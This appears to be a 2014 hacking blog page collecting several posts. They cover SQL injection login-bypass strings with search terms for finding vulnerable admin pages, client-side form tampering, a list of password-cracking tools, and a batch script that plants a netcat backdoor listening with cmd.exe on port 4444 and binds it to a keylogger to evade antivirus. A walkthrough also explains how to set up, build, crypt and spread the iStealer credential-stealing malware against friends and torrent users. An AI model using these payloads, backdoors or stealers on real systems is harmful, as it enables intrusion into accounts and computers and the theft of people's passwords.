Translate

Sunday, 15 June 2014

Strings Passwords For Vuln Website Hack

Hacking a Website/Admin account using SQL injection.
Hello, The big problem with SQL is its poor security issues surrounding is url strings and the login.
It is the easy way of getting into an administration area of a website that has .asp at the end of it, we going to use SQL injection for this.
Go to google or any Search Engine and puch in one of these words: adminlogin.asp - login asp - admin area - admin/logon.asp - admin/adminlogin.asp - admin/adminlogon.asp - admin/admin_login.asp - admin/admin_logon.asp - administrator/admin.asp - administrator/login.asp - administrator/logon.asp - root/login.asp - admin/index.asp - admin.asp - login.asp - logon.asp - adminlogin.asp - adminlogon.asp - admin_login.asp - admin_logon.asp - admin/admin.asp - admin/login.asp .................
Now you get a website ending with adminlogin.asp ,enter it.
At the Username/Admin Login/Login Name/User ID/.... : type in "Admin" or "Administrator"
And at the password type in :
'or' '=' (this is the best!!!!!!!-don't put that lol)
’ or 1=1–
1'or'1'='1
0'or'0'='0
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
’ or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

This tutorial is only for preventive use.
ENJOY.

How to Hack a Website with Basic HTML Coding

How to Hack a Website with Basic HTML Coding

Note: This basic method works only for websites with extremely low security barriers. Websites with robust security details will not be susceptible to this kind of simple attack.

Steps

  1. Hack a Website with Basic HTML Coding Step 1.jpg
    1
    Open the site you want to hack. Provide wrong username/password combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be prepared your experiment starts from here.
  2. Hack a Website with Basic HTML Coding Step 2.jpg
    2
    Right click anywhere on that error page =>> go to view source.
  3. Hack a Website with Basic HTML Coding Step 3.jpg
    3
    There you can see the HTML coding with JavaScript.• There you find somewhat like this....<_form action="...Login....">• Before this login information copy the URL of the site in which you are. (e.g. :"< _form..........action=http://www.targetwebsite.com/login.......>")
  4. Hack a Website with Basic HTML Coding Step 4.jpg
    4
    Then delete the JavaScript from the above that validates your information in the server.(Do this very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information)
  5. Hack a Website with Basic HTML Coding Step 5.jpg
    5
    Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=password>" with "<_type=text>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write )
  6. Hack a Website with Basic HTML Coding Step 6.jpg
    6
    Just go to file => save as and save it anywhere in your hard disk with ext.html(e.g.: c:\chan.html)
  7. Hack a Website with Basic HTML Coding Step 7.jpg
    7
    Reopen your target web page by double clicking 'chan.html' file that you saved in your hard disk earlier.• You see that some changes in current page as compared to original One. Don't worry.
  8. Hack a Website with Basic HTML Coding Step 8.jpg
    8
    Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.

TOP 10 PASSWORD CRACKING TOOLS

TOP 10 PASSWORD CRACKING TOOLS

A password is the secret word or phrase that is used for the authentication process in various applications. It is used to gain access to accounts and resources. A password protects our accounts or resources from unauthorized access.
What is Password Cracking?
Password cracking is the process of guessing or recovering a password from stored locations or from data transmission system. It is used to get a password for unauthorized access or to recover a forgotten password. In penetration testing, it is used to check the security of an application.
In recent years, computer programmers have been trying to create algorithms for password cracking in less time. Most of the password cracking tools try to login with every possible combination of words. If login is successful, it means the password was found. If the password is strong enough with a combination of numbers, characters and special characters, this cracking method may take hours to weeks or months. A few password cracking tools use a dictionary that contains passwords. These tools are totally dependent on the dictionary, so success rate is lower.
In the past few years, programmers have developed many password cracking tools. Every tool has its own advantages and disadvantages. In this post, we are covering a few of the most popular password cracking tools.
1. Brutus
Brutus is one of the most popular remote online password cracking tools. It claims to be the fastest and most flexible password cracking tool. This tool is free and is only available for Windows systems. It was released back in October 2000.
It supports HTTP (Basic Authentication), HTTP (HTML Form/CGI), POP3, FTP, SMB, Telnet and other types such as IMAP, NNTP, NetBus, etc. You can also create your own authentication types. This tool also supports multi-stage authentication engines and is able to connect 60 simultaneous targets. It also has resume and load options. So, you can pause the attack process any time and then resume whenever you want to resume.
This tool has not been updated for many years. Still, it can be useful for you.
2. RainbowCrack
RainbowCrack is a hash cracker tool that uses a large-scale time-memory trade off process for faster password cracking than traditional brute force tools. Time-memory trade off is a computational process in which all plain text and hash pairs are calculated by using a selected hash algorithm. After computation, results are stored in the rainbow table. This process is very time consuming. But, once the table is ready, it can crack a password must faster than brute force tools.
You also do not need to generate rainbow tablets by yourselves. Developers of RainbowCrack have also generated LM rainbow tables, NTLM rainbow tables, MD5 rainbow tables and Sha1 rainbow tables. Like RainbowCrack, these tables are also available for free. You can download these tables and use for your password cracking processes.
Download Rainbow tables here: http://project-rainbowcrack.com/table.htm
A few paid rainbow tables are also available, which you can buy from here: http://project-rainbowcrack.com/buy.php
This tool is available for both Windows and Linux systems.
Download Rainbow crack here: http://project-rainbowcrack.com/
3. Wfuzz
Wfuzz is another web application password cracking tool that tries to crack passwords with brute forcing. It can also be used to find hidden resources like directories, servlets and scripts. This tool can also identify different kind of injections including SQL Injection, XSS Injection, LDAP Injection, etc in Web applications.
Key features of Wfuzz password cracking tool:
  • Capability of injection via multiple points with multiple dictionary
  • Output in colored HTML
  • Post, headers and authentication data brute forcing
  • Proxy and SOCK Support, Multiple Proxy Support
  • Multi Threading
  • Brute force HTTP Password
  • POST and GET Brute forcing
  • Time delay between requests
  • Cookies fuzzing
Download here: http://www.edge-security.com/wfuzz.php
4. Cain and Abel
Cain and Abel is a well-known password cracking tool that is capable of handling a variety of tasks. The most notable thing is that the tool is only available for Windows platforms. It can work as sniffer in the network, cracking encrypted passwords using the dictionary attack, recording VoIP conversations, brute force attacks, cryptanalysis attacks, revealing password boxes, uncovering cached passwords, decoding scrambled passwords, and analyzing routing protocols.
Cain and Abel does not exploit any vulnerability or bugs. It only covers security weakness of protocols to grab the password. This tool was developed for network administrators, security professionals, forensics staff, and penetration testers.
Download here: http://www.oxid.it/ca_um/
5. John the Ripper
Want to learn more?? The InfoSec Institute CISSP Training course trains and prepares you to pass the premier security certification, the CISSP. Professionals that hold the CISSP have demonstrated that they have deep knowledge of all 10 Common Body of Knowledge Domains, and have the necessary skills to provide leadership in the creation and operational duties of enterprise wide information security programs.

InfoSec Institute's proprietary CISSP certification courseware materials are always up to date and synchronized with the latest ISC2 exam objectives. Our industry leading course curriculum combined with our award-winning CISSP training provided by expert instructors delivers the platform you need in order to pass the CISSP exam with flying colors. You will leave the InfoSec Institute CISSP Boot Camp with the knowledge and domain expertise to successfully pass the CISSP exam the first time you take it. Some benefits of the CISSP Boot Camp are:

  • Dual Certification - CISSP and ISSEP/ISSMP/ISSAP
  • We have cultivated a strong reputation for getting at the secrets of the CISSP certification exam
  • Our materials are always updated with the latest information on the exam objectives: This is NOT a Common Body of Knowledge review-it is intense, successful preparation for CISSP certification.
  • We focus on preparing you for the CISSP certification exam through drill sessions, review of the entire Common Body of Knowledge, and practical question and answer scenarios, all following a high-energy seminar approach.
John the Ripper is another well-known free open source password cracking tool for Linux, Unix and Mac OS X. A Windows version is also available. This tool can detect weak passwords. A pro version of the tool is also available, which offers better features and native packages for target operating systems. You can also download Openwall GNU/*/Linux that comes with John the Ripper.
Download John the Ripper here: http://www.openwall.com/john/
6. THC Hydra
THC Hydra is a fast network logon password cracking tool. When it is compared with other similar tools, it shows why it is faster. New modules are easy to install in the tool. You can easily add modules and enhance the features. It is available for Windows, Linux, Free BSD, Solaris and OS X. This tool supports various network protocols. Currently it supports Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Download THC Hydra here: https://www.thc.org/thc-hydra/
If you are a developer, you can also contribute to the tool’s development.
7. Medusa
Medusa is also a password cracking tool similar to THC Hydra. It claims to be a speedy parallel, modular and login brute forcing tool. It supports HTTP, FTP, CVS, AFP, IMAP, MS SQL, MYSQL, NCP, NNTP, POP3, PostgreSQL, pcAnywhere, rlogin, SMB, rsh, SMTP, SNMP, SSH, SVN, VNC, VmAuthd and Telnet. While cracking the password, host, username and password can be flexible input while performing the attack.
Medusa is a command line tool, so you need to learn commands before using the tool. Efficiency of the tool depends on network connectivity. On a local system, it can test 2000 passwords per minute.
With this tool, you can also perform a parallel attack. Suppose you want to crack passwords of a few email accounts simultaneously. You can specify the username list along with the password list.
Read more about this here: http://foofus.net/goons/jmk/medusa/medusa.html
Download Medusa here: http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
8. OphCrack
OphCrack is a free rainbow-table based password cracking tool for Windows. It is the most popular Windows password cracking tool, but can also be used on Linux and Mac systems. It cracks LM and NTLM hashes. For cracking Windows XP, Vista and Windows 7, free rainbow-tables are also available.
A live CD of OphCrack is also available to simplify the cracking. One can use the Live CD of OphCrack to crack Windows-based passwords. This tool is available for free.
Download OphCrack here: http://ophcrack.sourceforge.net/
Download free and premium rainbow tables for OphCrack here: http://ophcrack.sourceforge.net/tables.php
9. L0phtCrack
L0phtCrack is an alternative to OphCrack. It attempts to crack Windows password from hashes. For cracking passwords, it uses Windows workstations, network servers, primary domain controllers, and Active Directory. It also uses dictionary and brute force attacking for generating and guessing passwords. It was acquired by Symantec and discontinued in 2006. Later L0pht developers again re-acquired it and launched L0phtCrack in 2009.
It also comes with a schedule routine audit feature. One can set daily, weekly or monthly audits, and it will start scanning on the scheduled time.

Download L0phtCrack: http://www.l0phtcrack.com/download.html
10. Aircrack-NG
Aircrack-NG is a WiFi password cracking tool that can crack WEP or WPA passwords. It analyzes wireless encrypted packets and then tries to crack passwords via its cracking algorithm. It uses the FMS attack along with other useful attack techniques for cracking password. It is available for Linux and Windows systems. A live CD of Aircrack is also available.
If you want to use AirCrack NG for password cracking, read tutorials here: http://www.aircrack-ng.org/doku.php?id=getting_started
Download AirCrack-NG here: http://www.aircrack-ng.org/
How to create a password that is hard to crack
In this post, we have listed 10 password cracking tools. These tools try to crack passwords with different password cracking algorithms. Most of the password cracking tools are available for free. So, you should always try to have a strong password that is hard to crack by these password cracking tools. These are few tips you can try while creating a password.
The longer the password, the harder it is to crack: Password length is the most important factor. If you select a small password, password cracking tools can easily crack it by using few words combinations. A longer password will take a longer time in guessing. You’re your password at least 8 characters long.
Always use a combination of characters, numbers and special characters: This is another thing which makes passwords hard to crack. Password cracking tools try the combination of one by one. Have a combination of small characters, capital letters, and special characters. Suppose if you have only numbers in your password. Password cracking tools only need to guess numbers from 0-9. Here only length matters. But having a password combination of a-z, A-Z, 0-9 and other special characters with a good length will make it harder to crack. This kind of password sometimes takes weeks to crack.
Variety in passwords: One important thing you must always take care. Never use same password everywhere. Cyber criminals can steal passwords from one website and then try it on other websites too.
In case you are not sure about the strength of your password, you can check it from variety of online tools available for free. Try this official Microsoft Tool for checking the password strength.
What to avoid while selecting your password
There are a few things which were very common a few years back and still exist. Most of the password cracking tools start from there. Passwords that fall into this category are most easy to crack. These are the few password mistakes which you should avoid:
  • Never use a dictionary word
  • Avoid using your pet’s name, parent name, your phone number, driver’s license number or anything which is easy to guess.
  • Avoid using passwords with sequence or repeated characters: For Ex: 1111111, 12345678 or qwerty, asdfgh.
  • Avoid using passwords that fall in worst password list. Every year, data analysis companies publish the list of worst passwords of the year from analyzing the leaked password data.
    The top 11 worst passwords of 2012:
    • password
    • 123456
    • 12345678
    • abc123
    • qwerty
    • monkey
    • letmein
    • dragon
    • 111111
    • baseball
    • iloveyou
The list for 2013 is yet to be published.
Conclusion:
The password is what makes your network, web accounts and email accounts safe from unauthorized access. These password cracking tools are proof that your passwords can be cracked easily if you are not selecting good passwords. In the article, we have listed every kind of password cracking tools, including web application password cracking tools, network password cracking tools, email password cracking tools, Windows password cracking tools and Wi-Fi password cracking tools. Security researchers use these tools to audit the security of their apps and check how to make their application secure against these tools. Cyber criminals also use these tools, but for wrong purposes. They use these password cracking tools to crack passwords of users and then access their data.
Now it is up to you. You can either use these tools for good work or bad. Although we never encourage using any educational information for any cyber crime. This post is only for educational purposes. If you are using any of these tools for cyber crimes, the author or website publishing the article will never be responsible. Learn things to know how you can be hacked and how to protect yourself.
If you have anything to ask, you can comment below.

Saturday, 14 June 2014

Manully Fud Crypter

This post is based on how to bypass Anti-Virus by using FUD (Fully Undetectable). There are many Crypters and binders but manually based is the best in the business. In Penetrating tests FUD Crypter is most important part for ethical hackers. Metasploit encoders can also be used to bypass antivirus but in this tutorial it is manually made FUD by using netcat as backdoor.
1478711280x800virus1
Rcat is can also be used though it is good replica of Netcat and got less chance to get detected. We use a technique to wrap/bind our Package file with it. Follow the simple steps.

Step 1:

Below is the Code for Create a batch File. This will edit registry windows add your NetCat in System folder.

@echo off
copy rcat.exe %systemroot%\system32\rcat.exe
if errorlevel 0 goto regedit
goto error
:regedit
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d “%systemroot%\system32\rcat.exe -L -d -p 4444 -t -e cmd.exe”
if errorlevel 0 goto ip
:error
echo something wrong with the program.
goto end
:ip
echo write down the IP address from the table
ipconfig
:end
echo end.
nc -L -p 4444 -t
 

Step 2:

Now open notepad copy this code in it & save it with name .bat.

Step 3:

Download Rcat latest version. Copy rcat.exe in the same directory where this notepad named .bat exists.

Step 4:

Now we Use WinRAR to combine or BIND there two files (rcat.exe + Notpad). Click on ADD to archive

 

Step 5:

On the Next window that appear check Create SFX Archive. Go to Advance TAB & click SFX Options. Check out Options as i do


 

Step 6:

Go to MODES Tab and check on HIDE ALL. Click OK to create a Batch File.
New File will appear at Same Directory. So we have Combined these to files but to make it more we do as follows:
Start Panel >> cmd >> type = iexpress
Untitled
  • Click NEXT, Leave it as Default.
  • Choose Package Title e.g TEST.
  • Leave as Default until Package FILE appears.
  • Now ADD those two files i.e 1st (.exe file that we made by above method ) & 2nd (your Key-logger file )
  • iExpress will Combine them to make One File.

 

Step 7:

  • After Adding files, INSTALL Program to Launch will appear. On the Install Program select Simple Setup and on the Post Install Program select the Backdoor.
  • Select HIDDEN on the next window. On Finished message leave as default.
  • Package Name and Option Give the target path and check hidden file extracting process
Untitled

Step 8:

  • On the next Window NO Restart and the Don’t SAVE in the last and Create Package.
Congrats our Package has been created and it has the ability to Bypass most of the Antivirus here is the Report of our created Package.

Thursday, 12 June 2014

Hacking facebook and other accounts with istealer 6.0 legend keyloger

DOWNLOAD HERE

Winrar Password is : 12345

There are diffirent way's to steal passwords.
I want to be able to steal passwords from cookie files with 1 click,


well what do you know it exists! It's a cookie stealer called iStealer ( 6.0 is newest version ).
It steals every cookie password from the slave's browser, and shows it to the attacker.
So if you do it correctly you will have hotmail, netlog, facebook, WoW, rapidshare and other passwords from lots of people in no time.

I'll set one up, and will go thru all the details.

Prepare yourself

1st Download iStealer 6.0 ( link is at the bottom of the thread )

2th Disable your virusscanner, this is because your antivirus sees the iStealer program as a keylogger ( it's acctualy a CookieStealer but whatever )

3th Register domain and hosting
iStealer requires a webserver, this is because when someone click's your own made "Virus" it has to send the passwords and usernames somewhere.
I suggest http://www.000webhost.com/ for free webhosting, so register a domain there.

The registration can take a while, but when u have your domain registered, go to the cPanel.
Once your on the cPanel, click on MySQL ( this is under the tab "Software / Services" )

Now create a new database and user. Something like this

MySQL database name: a7356028_stealer
MySQL user name: a7356028_theadmin
Password for MySQL user: 123456
Then click create database.

Configure to steal

Now extract the downloaded zip file ( below the thread ).
You should have iStealer 6.0.exe, and a map called PHP Logger.
Open index.php in the map PHP Logger with notepad or any text-editor.

you see a bunch of codes, but dont worry, we only need the first part of the php file. Search for the CONFIGURATION section, this will be in it

$dbHost = "localhost"; // MySQL host
$dbUser = "suicide_admin"; // MySQL username
$dbPass = "GOX"; // MySQL password
$dbDatabase = "suicide_is"; // MySQL database name

$username = "admin"; // Login Username
$password = "GOV"; // Login Password
$logspage = 100; // Number of logs per page

Configure this with you own MySQL database information. Then it should look like this

$dbHost = "localhost"; // MySQL host
$dbUser = "a7356028_theadmin"; // MySQL username
$dbPass = "123456"; // MySQL password
$dbDatabase = "a7356028_stealer"; // MySQL database name

$username = "admin"; // Login Username
$password = "whatuwant"; // Login Password
$logspage = 100; // Number of logs per page

Note that the $username and $password variable will be used to log in your website, so choose it carefully.

Now save the file.

Loading it up
Go back to the cPanel of your site, and click on File Manager ( under the tab "Files )
Log in with your 000webhost password and continue.
Click on public_html map, and once ur in it, click Upload.
Select the index.php you saved before, and the style.css

Upload it.

Then just browse to your domain name in your browser, and login with the $username and $password you choose in the index.php ( in my case admin and whatuwant ). Now you have the page where the passwords and usernames are stored.

Making the Stealer File!

Now everything is set up, we have to make our CookieStealer file.
Just open iStealer 6.0.exe, enter your domain on the top ( edit things you want, like changing the icon etc ).

Click build!

Testing, crypting, spreading?

Testing?

To see if it works, just click it yourself! If you enter your website, and see your passwords and usernames, it works!


Crypting?

Well, it worked on yourself, because your antivirus is not up, but most of the people have antivirusscanner on all the time, so you might think of crypting it ( making it undetectable ), i'll talk about this later ( and show u some tools ), in the main time, use Google!

Spreading?

Just make a torrent file with your File in it ( With a combine tool - Google it ).
Or just go to the computer of your friends, shut down their antivirus ( if your file isn't crypted ), and click the file.

Dont spread, it's illegal.

Tuesday, 10 June 2014

Saddam Crypter Fud Free Download

DOWNLOAD HERE


Zip password is 12345

Download PhotoScape 3.6.5

PhotoScape is a fun and easy photo editing software that enables you to fix and enhance photos.

To install PhotoScape 3.6.5 on your computer, click one of the Free Download buttons below.


Get it from softonic.com!
:: Free Download from softonic.com (20.3MB)

Get it from CNET Download.com!
:: Free Download from download.cnet.com (20.3MB)

Get it from brothersoft.com!
:: Free Download from brothersoft.com (20.3MB)

Version: 3.6.5 Change Log
Effect Brush Video
PhotoScape is provided free of charge.
We are always upgrading PhotoScape.
You can support future development by donating.

This software is Microsoft Windows compatible. (Microsoft Windows NT/2000/XP/Vista/7/8)
If you are a user of Windows 98 or Me, please use PhotoScape 3.4
If you are a Mac user, use PhotoScape X for Mac and VideoBlend for Mac

We welcome volunteers who are interested in translating PhotoScape into their own language.
Click Translator's guide for Multi-language support.

want to download direct then click this link
http://www.megafileupload.com/en/file/540125/Editingimages-rar.html


Monday, 9 June 2014